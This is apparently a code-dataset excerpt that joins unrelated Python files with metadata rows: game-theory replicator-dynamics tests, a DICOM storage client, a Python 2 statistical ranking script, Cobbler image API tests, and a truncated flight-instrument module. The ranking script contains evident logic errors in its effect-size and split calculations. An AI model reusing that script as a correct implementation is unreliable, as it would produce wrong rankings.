[2.53100479e-01, 2.04943791e-05, 7.45339443e-01, 1.53958396e-03], [2.52864331e-01, 1.71936064e-05, 7.45655852e-01, 1.46262303e-03], [2.52645987e-01, 1.44237080e-05, 7.45949973e-01, 1.38961674e-03], [2.52444104e-01, 1.20990188e-05, 7.46223449e-01, 1.32034782e-03], [2.52257447e-01, 1.01486469e-05, 7.46477791e-01, 1.25461296e-03], [2.52084872e-01, 8.51182213e-06, 7.46714395e-01, 1.19222110e-03], [2.51925320e-01, 7.13869064e-06, 7.46934548e-01, 1.13299311e-03], [2.51777814e-01, 5.98662919e-06, 7.47139439e-01, 1.07676038e-03], [2.51641450e-01, 5.02038939e-06, 7.47330165e-01, 1.02336449e-03], [2.51515390e-01, 4.20987155e-06, 7.47507744e-01, 9.72656120e-04], [2.51398863e-01, 3.53027631e-06, 7.47673112e-01, 9.24494781e-04], [2.51291152e-01, 2.96001271e-06, 7.47827141e-01, 8.78747738e-04], [2.51191595e-01, 2.48172331e-06, 7.47970634e-01, 8.35290020e-04], [2.51099580e-01, 2.08057621e-06, 7.48104336e-01, 7.94003505e-04], [2.51014541e-01, 1.74422498e-06, 7.48228938e-01, 7.54776690e-04], [2.50935955e-01, 1.46226491e-06, 7.48345078e-01, 7.17504179e-04], [2.50863336e-01, 1.22585116e-06, 7.48453351e-01, 6.82086278e-04], [2.50796237e-01, 1.02769432e-06, 7.48554306e-01, 6.48428765e-04], [2.50734243e-01, 8.61444851e-07, 7.48648453e-01, 6.16442360e-04], [2.50676969e-01, 7.22075292e-07, 7.48736266e-01, 5.86042659e-04], [2.50624061e-01, 6.05224449e-07, 7.48818184e-01, 5.57149616e-04], [2.50575191e-01, 5.07304773e-07, 7.48894614e-01, 5.29687483e-04], [2.50530054e-01, 4.25231575e-07, 7.48965936e-01, 5.03584414e-04], [2.50488370e-01, 3.56536646e-07, 7.49032501e-01, 4.78772412e-04], [2.50449879e-01, 2.99072838e-07, 7.49094635e-01, 4.55186947e-04], [2.50414339e-01, 2.50787707e-07, 7.49152643e-01, 4.32766625e-04], [2.50381527e-01, 2.09990839e-07, 7.49206810e-01, 4.11453246e-04], [2.50351237e-01, 1.75740049e-07, 7.49257395e-01, 3.91191937e-04], [2.50323280e-01, 1.46960312e-07, 7.49304642e-01, 3.71930334e-04], [2.50297478e-01, 1.22681547e-07, 7.49348781e-01, 3.53618629e-04], [2.50273668e-01, 1.02313601e-07, 7.49390020e-01, 3.36209829e-04], [2.50251700e-01, 8.53321199e-08, 7.49428555e-01, 3.19659221e-04], [2.50231434e-01, 7.12334339e-08, 7.49464570e-01, 3.03924199e-04], [2.50212740e-01, 5.95800286e-08, 7.49498236e-01, 2.88964386e-04], [2.50195501e-01, 4.99771822e-08, 7.49529708e-01, 2.74741555e-04], [2.50179604e-01, 4.19815889e-08, 7.49559135e-01, 2.61219233e-04], [2.50164947e-01, 3.51538946e-08, 7.49586655e-01, 2.48362728e-04], [2.50151436e-01, 2.93685983e-08, 7.49612395e-01, 2.36139268e-04], [2.50138985e-01, 2.44612938e-08, 7.49636473e-01, 2.24517619e-04], ] ) xs = replicator_dynamics(y0=y0, timepoints=timepoints, A=M) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_game_size_4_default_y0_example_1(): M = np.array([[3, 2, 4, 2], [5, 1, 1, 3], [6, 2, 3, 2], [1, 3, 4, 7]]) timepoints = np.linspace(0, 10, 100) expected_xs_over_time = np.array( [ [2.50000000e-01, 2.50000000e-01, 2.50000000e-01, 2.50000000e-01], [2.41719166e-01, 2.35735156e-01, 2.53873636e-01, 2.68672042e-01], [2.32546984e-01, 2.21360179e-01, 2.55769777e-01, 2.90323060e-01], [2.22291827e-01, 2.06871196e-01, 2.55261786e-01, 3.15575190e-01], [2.10731484e-01, 1.92233270e-01, 2.51864185e-01, 3.45171061e-01], [1.97619659e-01, 1.77375409e-01, 2.45043522e-01, 3.79961410e-01], [1.82707977e-01, 1.62190468e-01, 2.34255381e-01, 4.20846174e-01], [1.65796132e-01, 1.46547147e-01, 2.19029301e-01, 4.68627420e-01], [1.46825571e-01, 1.30325960e-01, 1.99128685e-01, 5.23719784e-01], [1.26021893e-01, 1.13492486e-01, 1.74796565e-01, 5.85689056e-01], [1.04051013e-01, 9.62074113e-02, 1.47031763e-01, 6.52709813e-01], [8.20816740e-02, 7.89301100e-02, 1.17717959e-01, 7.21270257e-01], [6.16068147e-02, 6.24180199e-02, 8.93556151e-02, 7.86619550e-01], [4.39995702e-02, 4.75413069e-02, 6.43425051e-02, 8.44116618e-01], [3.00443142e-02, 3.49797125e-02, 4.41856313e-02, 8.90790342e-01], [1.97703777e-02, 2.50057355e-02, 2.91865133e-02, 9.26037374e-01], [1.26494877e-02, 1.74854076e-02, 1.87200451e-02, 9.51145060e-01], [7.93309603e-03, 1.20349937e-02, 1.17584783e-02, 9.68273432e-01], [4.90797650e-03, 8.19467468e-03, 7.28166293e-03, 9.79615686e-01], [3.00928572e-03, 5.54018743e-03, 4.46734830e-03, 9.86983179e-01], [1.83444440e-03, 3.72835899e-03, 2.72426145e-03, 9.91712935e-01], [1.11413336e-03, 2.50170133e-03, 1.65492179e-03, 9.94729244e-01], [6.75070430e-04, 1.67550183e-03, 1.00287691e-03, 9.96646551e-01], [4.08428511e-04, 1.12084196e-03, 6.06805960e-04, 9.97863924e-01], [2.46874544e-04, 7.49242911e-04, 3.66801756e-04, 9.98637081e-01], [1.49135183e-04, 5.00608887e-04, 2.21588946e-04, 9.99128667e-01], [9.00578701e-05, 3.34385059e-04, 1.33812730e-04, 9.99441744e-01], [5.43699910e-05, 2.23313206e-04, 8.07866707e-05, 9.99641530e-01], [3.28200257e-05, 1.49118817e-04, 4.87665696e-05, 9.99769295e-01], [1.98098290e-05, 9.95680219e-05, 2.94351134e-05, 9.99851187e-01], [1.19560257e-05, 6.64791103e-05, 1.77653131e-05, 9.99903800e-01], [7.21588878e-06, 4.43855409e-05, 1.07220167e-05, 9.99937677e-01], [4.35460889e-06, 2.96335830e-05, 6.47047541e-06, 9.99959541e-01], [2.62795277e-06, 1.97844865e-05, 3.90485418e-06, 9.99973683e-01], [1.58581836e-06, 1.32085926e-05, 2.35635571e-06, 9.99982849e-01], [9.57098845e-07, 8.81857690e-06, 1.42214629e-06, 9.99988802e-01], [5.77181917e-07, 5.88651878e-06, 8.57630601e-07, 9.99992679e-01], [3.48017960e-07, 3.92912327e-06, 5.17117549e-07, 9.99995206e-01], [2.10432900e-07, 2.62354883e-06, 3.12680828e-07, 9.99996853e-01], [1.27160084e-07, 1.75168432e-06, 1.88946318e-07, 9.99997932e-01], [7.69138599e-08, 1.17045061e-06, 1.14285800e-07, 9.99998638e-01], [4.67857994e-08, 7.82807429e-07, 6.95187050e-08, 9.99999101e-01], [2.81940356e-08, 5.22518381e-07, 4.18933223e-08, 9.99999407e-01], [1.66353720e-08, 3.46827263e-07, 2.47183847e-08, 9.99999612e-01], [9.92969426e-09, 2.31604309e-07, 1.47544662e-08, 9.99999744e-01], [5.86008245e-09, 1.52926389e-07, 8.70745685e-09, 9.99999833e-01], [3.61260541e-09, 1.01921785e-07, 5.36794489e-09, 9.99999889e-01], [2.35820495e-09, 6.89433682e-08, 3.50403969e-09, 9.99999925e-01], [1.54512934e-09, 4.67336874e-08, 2.29589660e-09, 9.99999949e-01], [9.91566874e-10, 3.15653821e-08, 1.47336228e-09, 9.99999966e-01], [6.23213391e-10, 2.13755295e-08, 9.26028545e-10, 9.99999977e-01], [3.89169337e-10, 1.45088069e-08, 5.78264090e-10, 9.99999985e-01], [2.44232046e-10, 9.82444655e-09, 3.62902722e-10, 9.99999990e-01], [1.55958046e-10, 6.64441716e-09, 2.31736960e-10, 9.99999993e-01], [1.01833748e-10, 4.50886059e-09, 1.51314038e-10, 9.99999995e-01], [6.61625623e-11, 3.05585415e-09, 9.83104808e-11, 9.99999997e-01], [4.22829112e-11, 2.06460089e-09, 6.28278830e-11, 9.99999998e-01], [2.66805156e-11, 1.40000880e-09, 3.96443958e-11, 9.99999999e-01], [1.67673488e-11, 9.49807666e-10, 2.49144894e-11, 9.99999999e-01], [1.05528316e-11, 6.42239872e-10, 1.56803796e-11, 9.99999999e-01], [2.03838562e-12, 2.61718511e-10, 3.02882291e-12, 1.00000000e00], [-4.66662938e-12, -4.40298241e-11, -6.93411260e-12, 1.00000000e00], [-9.48563948e-12, -2.72252392e-10, -1.40946462e-11, 1.00000000e00], [-1.24186447e-11, -4.22949193e-10, -1.84527780e-11, 1.00000000e00], [-1.34656449e-11, -4.96120226e-10, -2.00085079e-11, 1.00000000e00], [-1.26266403e-11, -4.91765491e-10, -1.87618360e-11, 1.00000000e00], [-9.90163080e-12, -4.09884990e-10, -1.47127621e-11, 1.00000000e00], [-9.10831756e-12, -3.98815250e-10, -1.35339828e-11, 9.99999999e-01], [-9.61446910e-12, -4.33990960e-10, -1.42860696e-11, 9.99999999e-01], [-9.68711978e-12, -4.48077852e-10, -1.43940204e-11, 9.99999999e-01], [-9.32626962e-12, -4.41075926e-10, -1.38578353e-11, 9.99999999e-01], [-8.53191859e-12, -4.12985183e-10, -1.26775142e-11, 9.99999999e-01], [-7.30406672e-12, -3.63805622e-10, -1.08530573e-11, 9.99999999e-01], [-5.64271399e-12, -2.93537243e-10, -8.38446446e-12, 9.99999999e-01], [-3.76042064e-12, -2.46757395e-10, -5.58757547e-12, 9.99999998e-01], [-3.34138439e-12, -2.20697822e-10, -4.96493302e-12, 9.99999999e-01], [-2.92234814e-12, -1.94638250e-10, -4.34229056e-12, 9.99999999e-01], [-2.50331189e-12, -1.68578677e-10, -3.71964811e-12, 9.99999999e-01], [-2.08427564e-12, -1.42519105e-10, -3.09700565e-12, 9.99999999e-01], [-1.66523938e-12, -1.16459532e-10, -2.47436319e-12, 9.99999999e-01], [-1.24620313e-12, -9.03999598e-11, -1.85172074e-12, 9.99999999e-01], [-8.29582639e-13, -6.44890104e-11, -1.23266784e-12, 9.99999999e-01], [-8.11410998e-13, -6.30915593e-11, -1.20566680e-12, 9.99999999e-01], [-7.93239357e-13, -6.16941082e-11, -1.17866576e-12, 9.99999999e-01], [-7.75067715e-13, -6.02966571e-11, -1.15166472e-12, 9.99999999e-01], [-7.56896074e-13, -5.88992060e-11, -1.12466368e-12, 9.99999999e-01], [-7.38724433e-13, -5.75017549e-11, -1.09766264e-12, 9.99999999e-01], [-7.20552791e-13, -5.61043038e-11, -1.07066160e-12, 9.99999999e-01], [-7.02381150e-13, -5.47068527e-11, -1.04366056e-12, 9.99999999e-01], [-6.84209509e-13, -5.33094016e-11, -1.01665952e-12, 9.99999999e-01], [-6.66037867e-13, -5.19119505e-11, -9.89658484e-13, 9.99999999e-01], [-6.47866226e-13, -5.05144994e-11, -9.62657445e-13, 9.99999999e-01], [-6.29694585e-13, -4.91170483e-11, -9.35656406e-13, 9.99999999e-01], [-6.11522943e-13, -4.77195972e-11, -9.08655366e-13, 9.99999999e-01], [-5.93351302e-13, -4.63221461e-11, -8.81654327e-13, 9.99999999e-01], [-5.75179661e-13, -4.49246950e-11, -8.54653288e-13, 9.99999999e-01], [-5.57008019e-13, -4.35272439e-11, -8.27652249e-13, 9.99999999e-01], [-5.38836378e-13, -4.21297928e-11, -8.00651210e-13, 9.99999999e-01], [-5.20664737e-13, -4.07323417e-11, -7.73650170e-13, 9.99999999e-01], [-5.02493095e-13, -3.93348906e-11, -7.46649131e-13, 9.99999999e-01], ] ) xs = replicator_dynamics(timepoints=timepoints, A=M) assert np.allclose(xs, expected_xs_over_time) def test_replicator_dynamics_with_incorrect_inputs(): """ Test that if an incorrect starting value is given, an error is raised """ M = np.array([[3, 2, 4, 2], [5, 1, 1, 3], [6, 2, 3, 2], [1, 3, 4, 7]]) y0 = np.array([1, 0, 0]) with pytest.raises(ValueError): replicator_dynamics(y0=y0, A=M) @given(A=arrays(np.int8, (3, 2)), B=arrays(np.int8, (3, 2))) def test_property_get_derivative_of_asymmetric_fitness(A, B): """ Property-based test of get_derivative_of_asymmetric_fitness for a 3x2 game """ t = 0 x = np.ones(A.shape[1] + A.shape[0]) derivative_of_fitness = get_derivative_of_asymmetric_fitness(x, t, A, B) assert len(derivative_of_fitness) == len(x) def test_get_derivative_of_asymmetric_fitness_example(): """ Test for the asymmetric derivative of fitness function """ M = np.array([[3, 2, 3], [4, 1, 1], [2, 3, 1]]) N = np.array([[1, 2, 3], [3, 2, 1], [2, 1, 3]]) x_values = ( np.array([1, 0, 0, 1, 0, 0]), np.array([1 / 2, 1 / 2, 0, 1 / 2, 1 / 2, 0]), np.array([0, 1 / 4, 3 / 4, 0, 1 / 4, 3 / 4]), np.array([1 / 5, 2 / 5, 2 / 5, 1 / 5, 2 / 5, 2 / 5]), np.array([1 / 2, 0, 1 / 2, 1 / 2, 0, 1 / 2]), np.array([2 / 4, 1 / 4, 1 / 4, 2 / 4, 1 / 4, 1 / 4]), ) derivative_values = ( np.array([0, 0, 0, 0, 0, 0]), np.array([0, 0, 0, 0, 0, 0]), np.array([0.0, -0.09375, 0.09375, 0.0, -0.234375, 0.234375]), np.array([0.128, -0.144, 0.016, 0.048, -0.144, 0.096]), np.array([0.375, 0.0, -0.375, -0.375, 0.0, 0.375]), np.array([0.125, 0.0, -0.125, -0.09375, -0.046875, 0.140625]), ) for x_value, expected_derivative in zip(x_values, derivative_values): derivative = get_derivative_of_asymmetric_fitness(x=x_value, t=0, A=M, B=N) assert np.allclose(derivative, expected_derivative), x_value @settings(max_examples=10) @given( A=arrays(np.int8, (4, 2), elements=integers(0, 100)), B=arrays(np.int8, (4, 2), elements=integers(0, 100)), ) def test_property_of_output_dimension_for_asymmetric_games_of_size_4_2(A, B): """ Property-based test of asymmetric_replicator_dynamics for a 4x2 game """ xs1, xs2 = asymmetric_replicator_dynamics(A, B) assert all(len(x) == 4 for x in xs1) assert all(len(x) == 2 for x in xs2) @given(A=arrays(np.int8, shape=(2, 2), elements=integers(1, 5))) def test_equivalence_between_symmetric_and_asymmetric_replicator_dynamics(A): """ Tests that when we have two populations with identical strategies then the output of the asymmetric_replicator_dynamics for both populations is the same as using just one population in replicator_dynamics. The test is carried out for 2x2 matrices with elements from 1-5 Note that the test hypothesis can find cases where this test can fail for larger elements or larger matrix sizes. One potenetial reason for this might be the fact that scipy.odeint() is a deprecated function. """ B = A.transpose() symmetric_xs = replicator_dynamics(A) asymmetric_row_xs, asymmetric_col_xs = asymmetric_replicator_dynamics(A, B) assert np.allclose(asymmetric_row_xs, asymmetric_col_xs, atol=1e-3) assert np.allclose(symmetric_xs, asymmetric_row_xs, atol=1e-3) assert np.allclose(symmetric_xs, asymmetric_col_xs, atol=1e-3) def test_asymmetric_replicator_dynamics_size_2_3_default_values(): """ Test the asymmetric replicator dynamics function for a 2x3 game by using the default values """ A = np.array([[1, 2, 3], [4, 5, 6]]) B = np.array([[7, 8, 9], [10, 11, 12]]) xs_A, xs_B = asymmetric_replicator_dynamics(A, B) assert np.allclose(xs_A[1], np.array([0.49249308, 0.50750692]), atol=1e-5) assert np.allclose(xs_A[-1], np.array([9.33624531e-14, 1]), atol=1e-5) assert np.allclose( xs_B[1], np.array([0.33000229, 0.3333222, 0.33667551]), atol=1e-5 ) assert np.allclose( xs_B[-1], np.array([2.04812640e-09, 4.53898590e-05, 9.99954607e-01]), atol=1e-5, ) def test_asymmetric_replicator_dynamics_size_2_3_given_timepoints(): """ Test the asymmetric replicator dynamics function for a 2x3 game and not using the default timepoints """ timepoints = np.linspace(0, 100, 100) A = np.array([[1, 1, 2], [2, 3, 2]]) B = np.array([[1, 2, 2], [2, 1, 3]]) xs_A, xs_B = asymmetric_replicator_dynamics(A, B, timepoints=timepoints) assert np.allclose(xs_A[1], np.array([0.30904906, 0.69095094])) assert np.allclose(xs_B[1], np.array([0.2196786, 0.1771107, 0.6032107])) assert np.allclose(xs_A[-1], np.array([0.2, 0.8])) assert np.allclose(xs_B[-1], np.array([-6.57013390e-14, 2.92761632e-17, 1])) def test_asymmetric_replicator_dynamics_size_4_6_given_x0_y0(): """ Test the asymmetric replicator dynamics function for a 4x6 game by specifying values for x0 and y0 """ A = np.array( [ [1, 20, 23, 21, 15, 4], [9, 29, 0, 14, 19, 27], [22, 28, 30, 12, 3, 25], [5, 16, 8, 17, 11, 18], ] ) B = np.array( [ [11, 39, 27, 15, 36, 35], [1, 31, 2, 18, 10, 19], [21, 38, 8, 24, 40, 32], [22, 37, 25, 7, 30, 0], ] ) x0 = np.array([0.5, 0.2, 0.2, 0.1]) y0 = np.array([0.4, 0.1, 0.1, 0.1, 0.2, 0.1]) xs_A, xs_B = asymmetric_replicator_dynamics(A, B, x0=x0, y0=y0) assert np.allclose( xs_A[1], np.array([0.48729326, 0.20349646, 0.21191178, 0.0972985]) ) assert np.allclose( xs_A[-1], np.array([-2.50483397e-15, 9.99977992e-01, 2.20078313e-05, 1.18367977e-17]), ) assert np.allclose( xs_B[1], np.array( [ 0.36455939, 0.11688505, 0.096508, 0.09537898, 0.22015362, 0.10651496, ] ), ) assert np.allclose( xs_B[-1], np.array( [ 4.58211507e-12, 1.00000000e00, 8.73932312e-12, 1.58763628e-18, -1.22965529e-14, -9.91094095e-17, ] ), )
mit
8,769,032,210,956,131,000
47.587363
84
0.561769
false
2.281732
true
false
false
scaramallion/pynetdicom
pynetdicom/apps/storescu/storescu.py
1
9028
#!/usr/bin/env python """A Storage SCU application. Used for transferring DICOM SOP Instances to a Storage SCP. """ import argparse import os from pathlib import Path import sys from pydicom import dcmread from pydicom.errors import InvalidDicomError from pydicom.uid import ( ExplicitVRLittleEndian, ImplicitVRLittleEndian, ExplicitVRBigEndian, DeflatedExplicitVRLittleEndian ) from pynetdicom import AE, StoragePresentationContexts from pynetdicom.apps.common import setup_logging, get_files from pynetdicom._globals import DEFAULT_MAX_LENGTH from pynetdicom.status import STORAGE_SERVICE_CLASS_STATUS __version__ = '0.3.0' def _setup_argparser(): """Setup the command line arguments""" # Description parser = argparse.ArgumentParser( description=( "The storescu application implements a Service Class User " "(SCU) for the Storage Service Class. For each DICOM " "file on the command line it sends a C-STORE message to a " "Storage Service Class Provider (SCP) and waits for a response." ), usage="storescu [options] addr port path" ) # Parameters req_opts = parser.add_argument_group('Parameters') req_opts.add_argument( "addr", help="TCP/IP address or hostname of DICOM peer", type=str ) req_opts.add_argument("port", help="TCP/IP port number of peer", type=int) req_opts.add_argument( "path", metavar="path", nargs='+', help="DICOM file or directory to be transmitted", type=str ) # General Options gen_opts = parser.add_argument_group('General Options') gen_opts.add_argument( "--version", help="print version information and exit", action="store_true" ) output = gen_opts.add_mutually_exclusive_group() output.add_argument( "-q", "--quiet", help="quiet mode, print no warnings and errors", action="store_const", dest='log_type', const='q' ) output.add_argument( "-v", "--verbose", help="verbose mode, print processing details", action="store_const", dest='log_type', const='v' ) output.add_argument( "-d", "--debug", help="debug mode, print debug information", action="store_const", dest='log_type', const='d' ) gen_opts.add_argument( "-ll", "--log-level", metavar='[l]', help=( "use level l for the logger (critical, error, warn, info, debug)" ), type=str, choices=['critical', 'error', 'warn', 'info', 'debug'] ) # Input Options in_opts = parser.add_argument_group('Input Options') in_opts.add_argument( '-r', '--recurse', help="recursively search the given directory", action="store_true" ) # Network Options net_opts = parser.add_argument_group('Network Options') net_opts.add_argument( "-aet", "--calling-aet", metavar='[a]etitle', help="set my calling AE title (default: STORESCU)", type=str, default='STORESCU' ) net_opts.add_argument( "-aec", "--called-aet", metavar='[a]etitle', help="set called AE title of peer (default: ANY-SCP)", type=str, default='ANY-SCP' ) net_opts.add_argument( "-ta", "--acse-timeout", metavar='[s]econds', help="timeout for ACSE messages (default: 30 s)", type=float, default=30 ) net_opts.add_argument( "-td", "--dimse-timeout", metavar='[s]econds', help="timeout for DIMSE messages (default: 30 s)", type=float, default=30 ) net_opts.add_argument( "-tn", "--network-timeout", metavar='[s]econds', help="timeout for the network (default: 30 s)", type=float, default=30 ) net_opts.add_argument( "-pdu", "--max-pdu", metavar='[n]umber of bytes', help=( f"set max receive pdu to n bytes (0 for unlimited, " f"default: {DEFAULT_MAX_LENGTH})" ), type=int, default=DEFAULT_MAX_LENGTH ) # Transfer Syntaxes ts_opts = parser.add_argument_group("Transfer Syntax Options") syntax = ts_opts.add_mutually_exclusive_group() syntax.add_argument( "-xe", "--request-little", help="request explicit VR little endian TS only", action="store_true" ) syntax.add_argument( "-xb", "--request-big", help="request explicit VR big endian TS only", action="store_true" ) syntax.add_argument( "-xi", "--request-implicit", help="request implicit VR little endian TS only", action="store_true" ) # Misc Options misc_opts = parser.add_argument_group('Miscellaneous Options') misc_opts.add_argument( "-cx", "--required-contexts", help=( "only request the presentation contexts required for the " "input DICOM file(s)" ), action="store_true", ) return parser.parse_args() def get_contexts(fpaths, app_logger): """Return the valid DICOM files and their context values. Parameters ---------- fpaths : list of str A list of paths to the files to try and get data from. Returns ------- list of str, dict A list of paths to valid DICOM files and the {SOP Class UID : [Transfer Syntax UIDs]} that can be used to create the required presentation contexts. """ good, bad = [], [] contexts = {} for fpath in fpaths: path = os.fspath(Path(fpath).resolve()) try: ds = dcmread(path) except Exception as exc: bad.append(('Bad DICOM file', path)) continue try: sop_class = ds.SOPClassUID tsyntax = ds.file_meta.TransferSyntaxUID except Exception as exc: bad.append(('Unknown SOP Class or Transfer Syntax UID', path)) continue tsyntaxes = contexts.setdefault(sop_class, []) if tsyntax not in tsyntaxes: tsyntaxes.append(tsyntax) good.append(path) for (reason, path) in bad: app_logger.error(f"{reason}: {path}") return good, contexts def main(args=None): """Run the application.""" if args is not None: sys.argv = args args = _setup_argparser() if args.version: print(f'storescu.py v{__version__}') sys.exit() APP_LOGGER = setup_logging(args, 'storescu') APP_LOGGER.debug(f'storescu.py v{__version__}') APP_LOGGER.debug('') lfiles, badfiles = get_files(args.path, args.recurse) for bad in badfiles: APP_LOGGER.error(f"Cannot access path: {bad}") ae = AE(ae_title=args.calling_aet) ae.acse_timeout = args.acse_timeout ae.dimse_timeout = args.dimse_timeout ae.network_timeout = args.network_timeout if args.required_contexts: # Only propose required presentation contexts lfiles, contexts = get_contexts(lfiles, APP_LOGGER) try: for abstract, transfer in contexts.items(): for tsyntax in transfer: ae.add_requested_context(abstract, tsyntax) except ValueError: raise ValueError( "More than 128 presentation contexts required with " "the '--required-contexts' flag, please try again " "without it or with fewer files" ) else: # Propose the default presentation contexts if args.request_little: transfer_syntax = [ExplicitVRLittleEndian] elif args.request_big: transfer_syntax = [ExplicitVRBigEndian] elif args.request_implicit: transfer_syntax = [ImplicitVRLittleEndian] else: transfer_syntax = [ ExplicitVRLittleEndian, ImplicitVRLittleEndian, DeflatedExplicitVRLittleEndian, ExplicitVRBigEndian ] for cx in StoragePresentationContexts: ae.add_requested_context(cx.abstract_syntax, transfer_syntax) if not lfiles: APP_LOGGER.warning("No suitable DICOM files found") sys.exit() # Request association with remote assoc = ae.associate( args.addr, args.port, ae_title=args.called_aet, max_pdu=args.max_pdu ) if assoc.is_established: ii = 1 for fpath in lfiles: APP_LOGGER.info(f'Sending file: {fpath}') try: ds = dcmread(fpath) status = assoc.send_c_store(ds, ii) ii += 1 except InvalidDicomError: APP_LOGGER.error(f'Bad DICOM file: {fpath}') except Exception as exc: APP_LOGGER.error(f"Store failed: {fpath}") APP_LOGGER.exception(exc) assoc.release() else: sys.exit(1) if __name__ == "__main__": main()
mit
6,390,212,979,904,259,000
29.093333
78
0.588835
false
3.876342
false
false
false
nave91/teak-nbtree
src/rank.py
1
4248
from lib import * import re from globfilerank import * def obs(f,alli): now = alli line = f.readline() while(line): lst = line.split() for i in lst: isitnum = re.match('^([^0-9]|\.)',i) if isitnum: now = i else: v = float(i) inc(v,now) inc(v,alli) for i in name: if i != alli: temp = {} temp["="] = i temp["x"] = mu[i] order.append(temp) line = f.readline() def inc(v,k): print v,"vvvvvvvvvvvvvvvvvvv" print k,"kkkkkkkkkkkkk" name.append(k) label[k] = 0 try: n[k] += 1 except KeyError: n[k] = 1 alli = n[k] try: x[k][alli] = v except KeyError: x[k] = {} x[k][alli] = v try: sumi[k] += v except KeyError: sumi[k] = v try: delta = v - mu[k] except KeyError: mu[k] = 0 delta = v - mu[k] try: mu[k] += delta/alli except KeyError: mu[k] = delta/alli try: m2[k] += delta*(v - mu[k]) except KeyError: m2[k] = delta*(v - mu[k]) var[k] = m2[k]/(alli - 1 + PINCH) def rank(alli,cohen,mittas,a12): cohen = cohen*(var[alli])**0.5 level = 0 total = n[alli] rdiv(0,len(order)-1,1,cohen,mittas,a12,level) def rdiv(low,high,c,cohen,mittas,a12,level): cut = div(low,high,cohen,mittas,a12) if cut: print "in cut",cut level += 1 c = rdiv(low,cut-1,c,cohen,mittas,a12,level) + 1 c = rdiv(cut,high,c,cohen,mittas,a12,level) else: for i in range(low,high): print order[i]["="],"orderrrrrrrrrr",c label[order[i]["="]] = c return c def div(low,high,cohen,mittas,a12): n0 = [0 for i in range(0,len(order))] n1 = [0 for i in range(0,len(order))] sum0 = [0 for i in range(0,len(order))] sum1 = [0 for i in range(0,len(order))] muAll = divInits(low,high,n0,n1,sum0,sum1) maxi = -1 cut = 0 for i in range(low,high): b = order[i]["="] n0[i] = n0[i-1] + n[b] sum0[i] = sum0[i-1] + sumi[b] left = n0[i] muLeft = sum0[i] / left right = n1[i] muRight = sum0[i] / right e = errDiff(muAll,left,muLeft,right,muRight) if cohen: if abs(muLeft - muRight) <= cohen: continue if mittas: if e < maxi: continue if a12: if bigger(low,i,high) < a12: continue maxi = e cut = i print cut,"cutttt" return cut def errDiff(mu,n0,mu0,n1,mu1): return n0*(mu - mu0)**2 + n1*(mu - mu1)**2 def divInits(low,high,n0,n1,sum0,sum1): b= order[low]["="] n0[low]= n[b] sum0[low]= sumi[b] b= order[high]["="] n1[high]= n[b] sum1[high]= sumi[b] for i in range(high-1,low-1,-1): b = order[i]["="] n1[i] = n1[i+1] + n[b] sum1[i] = sum1[i+1] + sumi[b] return sum1[low+1]/n1[low+1] def bigger(low,mid,high): below = [] above = [] below = values(low,mid-1) above = values(mid,high) return a12statistic(below,above) def a12statistic(below,above): more = 0 same = 0 comparisons = 1 for j in range(0,len(above)-1): for i in range(0,len(below)-1): comparisons += 1 more += above[j] if above[j] > below[i] else below[i] same += above[j] if above[j] == below[i] else below[i] return (more + 0.5*same)/comparisons def values(i,j): out = [] m = 0 for k in range(i,j): b = order[k]["="] for l,n in enumerate(x[b]): m += 1 out.append(x[b][n]) return out def ranks(f,cohens,mittas,a12): print "\n----|,",f.name,"|------------------" obs(f,0) rank(0,cohens,mittas,a12) maxi = len(order) for i in range(0,maxi): k = order[i]["="] print k print name,"nameee" print mu,"muuu" print label,"rank" print k,name[k],":mu",mu[k],":rank",label[k] f = open('../data/ska.txt','r') ranks(f,0.3,1,0.6) f.close()
gpl-2.0
-2,870,331,426,623,933,000
23.988235
66
0.476695
false
2.776471
false
false
false
cobbler/cobbler
tests/xmlrpcapi/image_test.py
1
2527
import pytest # TODO: Create fixture where image is create @pytest.fixture(scope="function") def remove_item(remote, token): """ Remove an item with the given name. :param token: The fixture to have the token for authenticated strings available. :param remote: The fixture to have the base xmlrpc connection. """ def _remove_item(itemtype, name): yield remote.remove_item(itemtype, name, token) return _remove_item @pytest.mark.usefixtures("cobbler_xmlrpc_base") class TestImage: def test_create_image(self, remote, token): """ Test: create/edit of an image object""" # Arrange # Act images = remote.get_images(token) image = remote.new_image(token) # Assert assert remote.modify_image(image, "name", "testimage0", token) assert remote.save_image(image, token) new_images = remote.get_images(token) assert len(new_images) == len(images) + 1 def test_get_images(self, remote): """ Test: get images """ # Arrange # Act remote.get_images() # Assert def test_get_image(self, remote): """ Test: Get an image object """ # Arrange # Act # Assert image = remote.get_image("testimage0") def test_find_image(self, remote, token): """ Test: Find an image object """ # Arrange # Act result = remote.find_image({"name": "testimage0"}, token) # Assert assert result def test_copy_image(self, remote, token): """ Test: Copy an image object """ # Arrange # Act image = remote.get_item_handle("image", "testimage0", token) # Assert assert remote.copy_image(image, "testimagecopy", token) def test_rename_image(self, remote, token, remove_item): """ Test: Rename an image object """ # Arrange name = "testimage1" image = remote.get_item_handle("image", "testimagecopy", token) # Act result = remote.rename_image(image, name, token) # Cleanup remote.remove_item("image", name, token) # Assert assert result def test_remove_image(self, remote, token): """ Test: remove an image object """ # Arrange # Act # Assert assert remote.remove_image("testimage0", token)
gpl-2.0
-5,530,098,281,154,148,000
20.973913
84
0.557974
false
4.108943
true
false
false
pmatigakis/Huginn
huginn/instruments.py
1
6186
""" The hugin.instruments module contains classes that simulate the aircraft's instruments """ import math from math import sqrt, log from huginn.fdm import Position, Velocities, Atmosphere, Orientation from huginn.constants import a0, T0, g, M, R from huginn.unit_conversions import convert_jsbsim_pressure, ur def true_airspeed(total_pressure, static_pressure, temperature): """Calculate the true airspeed Arguments: total_pressure: the total pressure in Pascal static_pressure: the static pressure in Pascal temperature: the temperature in kelvin returns the airspeed in knots """ impact_pressure = total_pressure - static_pressure t_t0 = temperature / T0 q_p = impact_pressure / static_pressure return a0 * sqrt(5.0 * (math.pow(q_p + 1.0, 2.0/7.0) - 1.0) * t_t0) def pressure_altitude(sea_level_pressure, pressure, temperature): """Calculate the pressure altitude Arguments: sea_level_pressure: the pressure at sea level in Pascal pressure: the pressure at the current altitude in Pascal temperature: the temperature in Kelvin """ return log(sea_level_pressure/pressure) * ((R * temperature) / (g * M)) class GPS(object): """The GPS class simulates the aircraft's GPS system.""" def __init__(self, fdmexec): self.fdmexec = fdmexec self._position = Position(fdmexec) self._velocities = Velocities(fdmexec) @property def latitude(self): """Returns the latitude in degrees""" return self._position.latitude @property def longitude(self): """Returns the longitude in degrees""" return self._position.longitude @property def altitude(self): """Returns the altitude in meters""" return self._position.altitude @property def 